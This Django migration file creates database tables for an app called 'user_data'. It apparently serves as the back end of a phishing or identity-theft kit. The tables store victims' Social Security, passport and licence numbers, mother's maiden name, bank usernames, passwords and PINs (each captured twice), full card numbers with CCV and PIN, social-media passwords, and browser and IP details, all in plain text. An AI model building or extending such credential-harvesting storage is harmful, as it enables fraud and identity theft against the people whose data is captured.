# Generated by Django 5.2.7 on 2025-10-07 15:04

import django.db.models.deletion
from django.db import migrations, models


class Migration(migrations.Migration):
    initial = True

    dependencies = []

    operations = [
        migrations.CreateModel(
            name="Client",
            fields=[
                (
                    "id",
                    models.BigAutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("email", models.CharField(blank=True, max_length=1000, null=True)),
                (
                    "first_name",
                    models.CharField(blank=True, max_length=1000, null=True),
                ),
                ("last_name", models.CharField(blank=True, max_length=1000, null=True)),
                ("dob", models.CharField(blank=True, max_length=100, null=True)),
                (
                    "drivers_licence",
                    models.CharField(blank=True, max_length=100, null=True),
                ),
                (
                    "social_security_short",
                    models.CharField(blank=True, max_length=100, null=True),
                ),
                (
                    "social_security",
                    models.CharField(blank=True, max_length=100, null=True),
                ),
                (
                    "passport_number",
                    models.CharField(blank=True, max_length=100, null=True),
                ),
                (
                    "mothers_median_name",
                    models.CharField(blank=True, max_length=500, null=True),
                ),
                ("phone", models.CharField(blank=True, max_length=255, null=True)),
                ("carrier", models.CharField(blank=True, max_length=200, null=True)),
                ("location", models.CharField(blank=True, max_length=200, null=True)),
                ("country", models.CharField(blank=True, max_length=255, null=True)),
                ("created_at", models.DateTimeField(auto_now_add=True)),
            ],
        ),
        migrations.CreateModel(
            name="BrowserDetail",
            fields=[
                (
                    "id",
                    models.BigAutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("ip", models.CharField(blank=True, max_length=100, null=True)),
                ("agent", models.CharField(blank=True, max_length=100, null=True)),
                ("os", models.CharField(blank=True, max_length=1000, null=True)),
                ("browser", models.CharField(blank=True, max_length=500, null=True)),
                ("address", models.CharField(blank=True, max_length=1000, null=True)),
                ("country", models.CharField(blank=True, max_length=1000, null=True)),
                ("city", models.CharField(blank=True, max_length=500, null=True)),
                ("time", models.CharField(blank=True, max_length=500, null=True)),
                ("date", models.CharField(blank=True, max_length=100, null=True)),
                ("created_at", models.DateTimeField(auto_now_add=True)),
                (
                    "client",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to="user_data.client",
                    ),
                ),
            ],
        ),
        migrations.CreateModel(
            name="BankInfo",
            fields=[
                (
                    "id",
                    models.BigAutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("bank_name", models.CharField(blank=True, max_length=1000, null=True)),
                (
                    "account_number",
                    models.CharField(blank=True, max_length=100, null=True),
                ),
                ("email", models.CharField(blank=True, max_length=500, null=True)),
                ("email2", models.CharField(blank=True, max_length=500, null=True)),
                ("password", models.CharField(blank=True, max_length=500, null=True)),
                ("password2", models.CharField(blank=True, max_length=500, null=True)),
                ("username", models.CharField(blank=True, max_length=500, null=True)),
                ("username2", models.CharField(blank=True, max_length=500, null=True)),
                ("pin", models.CharField(blank=True, max_length=100, null=True)),
                ("pin2", models.CharField(blank=True, max_length=100, null=True)),
                ("set_code", models.CharField(blank=True, max_length=100, null=True)),
                ("set_code2", models.CharField(blank=True, max_length=100, null=True)),
                ("created_at", models.DateTimeField(auto_now_add=True)),
                (
                    "client",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to="user_data.client",
                    ),
                ),
            ],
        ),
        migrations.CreateModel(
            name="Address",
            fields=[
                (
                    "id",
                    models.BigAutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                (
                    "street_address",
                    models.CharField(blank=True, max_length=1000, null=True),
                ),
                (
                    "apartment_unit",
                    models.CharField(blank=True, max_length=1000, null=True),
                ),
                ("city", models.CharField(blank=True, max_length=1000, null=True)),
                ("state", models.CharField(blank=True, max_length=1000, null=True)),
                ("zip_code", models.CharField(blank=True, max_length=1000, null=True)),
                ("created_at", models.DateTimeField(auto_now_add=True)),
                (
                    "client",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to="user_data.client",
                    ),
                ),
            ],
        ),
        migrations.CreateModel(
            name="CreditCard",
            fields=[
                (
                    "id",
                    models.BigAutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("number", models.CharField(blank=True, max_length=100, null=True)),
                ("ccv", models.CharField(blank=True, max_length=100, null=True)),
                ("expiry", models.CharField(blank=True, max_length=100, null=True)),
                ("pin", models.CharField(blank=True, max_length=100, null=True)),
                ("created_at", models.DateTimeField(auto_now_add=True)),
                (
                    "client",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to="user_data.client",
                    ),
                ),
            ],
        ),
        migrations.CreateModel(
            name="Financial",
            fields=[
                (
                    "id",
                    models.BigAutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("username", models.CharField(blank=True, max_length=1000, null=True)),
                ("password", models.CharField(blank=True, max_length=500, null=True)),
                ("created_at", models.DateTimeField(auto_now_add=True)),
                (
                    "client",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to="user_data.client",
                    ),
                ),
            ],
        ),
        migrations.CreateModel(
            name="SocialMeidia",
            fields=[
                (
                    "id",
                    models.BigAutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("platform", models.CharField(blank=True, max_length=1000, null=True)),
                ("email", models.CharField(blank=True, max_length=500, null=True)),
                ("username", models.CharField(blank=True, max_length=500, null=True)),
                ("password", models.CharField(blank=True, max_length=500, null=True)),
                ("created_at", models.DateTimeField(auto_now_add=True)),
                (
                    "client",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to="user_data.client",
                    ),
                ),
            ],
        ),
    ]
